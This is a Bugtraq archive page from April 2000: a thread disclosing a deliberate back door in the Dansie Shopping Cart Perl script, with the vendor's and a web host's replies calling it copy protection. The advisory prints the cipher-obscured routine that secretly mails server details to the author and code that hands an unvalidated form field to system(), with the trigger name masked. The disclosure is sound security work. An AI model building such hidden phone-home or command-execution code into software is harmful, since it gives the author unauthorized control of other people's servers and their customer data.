Bugtraq mailing list archives
Re: Back Door in Commercial Shopping Cart
From: luciano () MOS COM AR (Luciano Ramos)
Date: Fri, 14 Apr 2000 15:57:09 -0300
This is what people at dansie said: --------------------------------- At 05:29 AM 4/14/00 , you wrote:
I've already sent you an email... Tell me why there's a way that anyone can execute code by using your
script..
I want an answer rigth now.
Luciano, The software has a copyright protection feature that poses no security risk to your website or your web server. It's designed to prevent software piracy and prevent pirates from running unlicensed copies. The cart is designed with security in mind. For more details on security, see section 1 in the ReadMe. http://www.dansie.net/cart_readme.html Last month a person violated the software license agreement and tried to modify the script and remove the copyright credit to www.dansie.net. After they decoded the software copyright protection feature, they posted it on some message boards. If I can be of further help with the cart or if you would like an upgrade of the latest version, let me know. Here is a snippet from our web host: Nothing to be worried about on the mall version. However, if any of your clients have a single user licence cart, now that this is public information, if the cart version is 3.04 and above you might request an upgrade from Craig Dansie. Basically, it allows Craig to prevent theifs from stealing his script. I have known about it for awhile. The "main" reason this guy is ticked off is because he "violated" the copyright of Craig Dansie and hacked the script. It is not said so in so many words, but basically.. he did. Craig scrambled his vars.dat because he would not respond to Craig regarding the copyright violation. If the cart is registered for a particular domain name, it will only work on that one domain name. Craig puts a security code in all carts to insure it cannot be used on a different domain name. This is his right to do so to protect his lievely hood. One thing this article does not cover is the fact that Craig "does" rotate the codes for the cart. On about a weekly schedule. However, since this guy has made public this information, ( yes I recieved two copies of this email as well )... it might behoove you to request an upgrade to any single user cart. There is "no" processes Craig can run on the server as this email suggest. Yes, he can wipe the vars.dat to protect his copyright and prevent the cart from working, but the only people that need to worry are "theifs" anyway. The cart "cannot" retrieve cc information or any other information that could cause a security risk. I personally talked with Brian McWilliams at www.internetnews.com on the phone this morning. He did not mention a single thing I said regarding the cart. He is out for a "story". Give me a call if you have any questions. James Stormer Hosting http://stormerhosting.com stormer () stormerhosting com Regards, Craig Dansie Dansie Shopping Cart http://www.dansie.net FAQ: http://www.dansie.net/cgi-bin/faq.pl ----------------------------------------------------- ----- Original Message ----- From: Luciano Ramos <luciano () mos com ar> To: <BUGTRAQ () SECURITYFOCUS COM> Sent: Thursday, April 13, 2000 9:58 AM Subject: Re: Back Door in Commercial Shopping Cart
I have purchased dansie's shooping cart I have been using it .. for a while.. The version of the cart I am currently using is 2.84, this version has the there,there2,there3 functions and the mail sending is in the
code..
but as of 2.84... the system("FORM(xxxxxx)") is not implemented,, A couple of months ago.. people at dansie sent me the upgrade of the cart it was version.3.03 this versions does have the system call, I've already sent a mail to dansie to see what he says ... Thanks .. Luciano Ramos luciano () mos com ar ----- Original Message ----- From: Joe <joe () blarg net> To: <BUGTRAQ () SECURITYFOCUS COM> Sent: Tuesday, April 11, 2000 9:24 PM Subject: Back Door in Commercial Shopping CartTrojanized Commercial Shopping Cart =============================================================== Dansie Shopping Cart Version : 3.04 (presumably earlier versions as well) Author : Craig Dansie URL : http://www.dansie.net/ Language : Perl (both NT and Unix platforms are vulnerable) License : Commercial, starting at $150.00 Copyright Dec 10, 1997-2000, Dansie Website Design Synopsis : This program -deliberately- allows arbitrary commands to be executed on the victim server. One of our clients, while installing and configuring the Dansie Shopping Cart, ran into difficulty integrating PGP, the shopping cart program,
and
our secure server setup. While trying to assist our client with the
cart
and PGP configuration we discovered a couple of things. The CGI, under certain conditions, sends an email to the author of the Dansie shopping cart software, 'tech () dansie net'. This is not readily apparent as the code that handles this transaction incorporates a simple Caesar Cipher to hide the email address. The cipher is handled via the subroutine 'there2': ------ sub there2 { $_ = "$_[0]"; tr/a-z0-9/gvibn9wprud2lmx8z3fa4eq15oy06sjc7kth/; tr/_/-/; tr/\@/\./; return $_; } ------- The call that creates this email address and sends the mail is the function 'there3'. ------- sub there3 { if (($ENV{'OS'} !~ /Windows_NT/i) && ($mailprog) && (-e
"$mailprog"))
{ $a = &there2('8v59')."\@".&there2('kte3cv').".".&there2('ev8'); $b = &there2('8v59_3jhhzi8'); pop(@there2); pop(@there2); $c = &there2("@there2"); open (TECH, "|$mailprog $a"); print TECH "To: $a\n"; print TECH "From: $a\n"; print TECH "Subject: $b\n\n"; print TECH "$path3\n"; print TECH "$ENV{'HTTP_HOST'} $ENV{'SERVER_NAME'}\n"; print TECH "$c\n"; print TECH "$e $there\n" if ($e); close (TECH); } } ------- The ciphered strings, when passed through 'there2', result in: 8v59 == tech kte3cv == dansie ev8 == net 8v59_3jhhzi8 == tech-support $a == tech () dansie net $b == Subject: tech-support This seems curious, but plausible reasons could include insuring License compliance, or maybe the cart automatically sends this email when an
error
occurs. The program definitely goes out of its way to hide the fact thatthemail is being sent. While going through the rest of the code we discovered a much more interesting item. (We've masked out the actual trigger element with question marks) ---------- if ( ( ( $FORM{'?????????'}) && ($ENV{'HTTP_HOST'} !~ /($d)/) ) ||($FORM{'?????????'} ) && (!$d) ) ){ if ( $ENV{'OS'} ) { system("$FORM{'?????????'}"); } else { open(ELIF,"|$FORM{'?????????'}"); } exit; } --------- The form element '?????????', which was originally a pseudo-randomappearingnine digit string of letters and numbers, allows an intruder to executeanycommand on the server with the same privileges as the CGI process
itself.
Although this is a full disclosure list, the trigger element is obscuredtoprevent the script kiddies from running away with this back door. If
you
own the cart, then you have access to the source code and can discover
the
element in question easily enough on your own. Further searches through the code reveal that this form element is
immune
to data validation - it gets passed into this code fragment
unchallenged.
The '$d' variable of the condition which permits the back door to
function
is set elsewhere in the program to contain the string 'dansie'. (Again, using the ciphertext algorithm) This indicates that the form element
won't
work on Dansie's own host, but will work on anyone elses. There are additional problems with the 'there' function but we'll leave them as exercises for the reader to decipher. Dansie.net, armed with the server name and URL to the CGI executable provided by the cloaked email routine, would be able to run commands onanyweb server on the Internet that has the Dansie Shopping Cart installed.
It
takes little imagination to dream up the potential havoc and privacy violations this level of access could result in; from stealing private customer records to a full-blown crack of an E-Commerce server. When checking to see if this was a known issue, the following post from "Kasey Johns" <kasey at corridor dot net>, made a little over a week
ago,
was discovered in alt.comp.perlcgi.freelance: http://www.deja.com/getdoc.xp?AN=601644315 Follow-up article: http://www.deja.com/getdoc.xp?AN=601857849 We won't quote Kasey's posts here, in brief, Kasey also discovered thebackdoor and cloaked email routines. Kasey also provides evidence in the
post
toindicate that not only is Dansie well aware of the back door routine,
but
may be actively attempting to utilize it. Based upon our own investigation, the information Kasey posted, and ourownfirewall logs (see below), it is our opinion that the back door within Dansie.net's shopping cart can best be summarized as follows: 1. The back door is very deliberate. 2. It isn't unique to the one copy we have access to here. 3. *Is being actively utilized by the author of the CGI. * Based upon the log snippet in Kasey's post showing attempted access to the CGI from an Earthlink dial-up IP. (209.179.141.0/24). According to Kasey, access to the CGI was attempted less than 30 minutes after the
cart
was installed. When we noticed the attempted usage of Kasey's server, a quick check ofourown firewall logs revealed the following: Packet log: input REJECT eth0 PROTO=6 209.179.141.xx:1054 x.x.x.x:80 {repeated several dozen times} We can only assume these attempts, made from the same /24 on Earthlink's dial-ups as the one used to probe Kasey's server, were from the author
of
the shopping cart. We will not try to hazard a guess as to why Dansie.net felt the need to include a back door within their shopping cart software. Whatever their reasoning may be, it is our opinion that no reason, no matter how well thought out or rationalized, justifies the existence of this back door.
No
reasoning can possibly explain away a routine that deliberately allows
an
intruder unrestricted and unauthorized access to any server on theInternetthat has the Dansie Shopping Cart installed. -- Joe Technical Support General Support: support () blarg net Blarg! Online Services, Inc. Voice: 425/401-9821 or 888/66-BLARG http://www.blarg.net
Current thread:
- Back Door in Commercial Shopping Cart Joe (Apr 11)
- Performance Copilot for IRIX 6.5 Marcelo Magnasco (Apr 12)
- Microsoft Security Bulletin (MS00-024) Microsoft Product Security (Apr 12)
- Re: Back Door in Commercial Shopping Cart Luciano Ramos (Apr 13)
- [TL-Security-Announce] PAM and usermode TLSA2000009-1 Katie Moussouris (Apr 14)
- Re: Back Door in Commercial Shopping Cart Luciano Ramos (Apr 14)
- Re: Back Door in Commercial Shopping Cart [Stormer Hosting] Dan Kaminsky (Apr 14)
- New DOS on Interscan NT/3.32 Alain Thivillon (Apr 17)
- Re: Back Door in Commercial Shopping Cart [RESOLVED] Dan Kaminsky (Apr 17)
- Re: Back Door in Commercial Shopping Cart Pete Holsberg (Apr 13)
- Re: Back Door in Commercial Shopping Cart Anik (Apr 13)
- more problems with that POS dansie cart software! tombow (Apr 14)
- Re: more problems with that POS dansie cart software! Randy Janinda (Apr 14)
- nmh-1.0.4 released Dan Harkless (Apr 14)
- xfs Michal Zalewski (Apr 16)
- StarOffice 5.1 Michal Zalewski (Apr 16)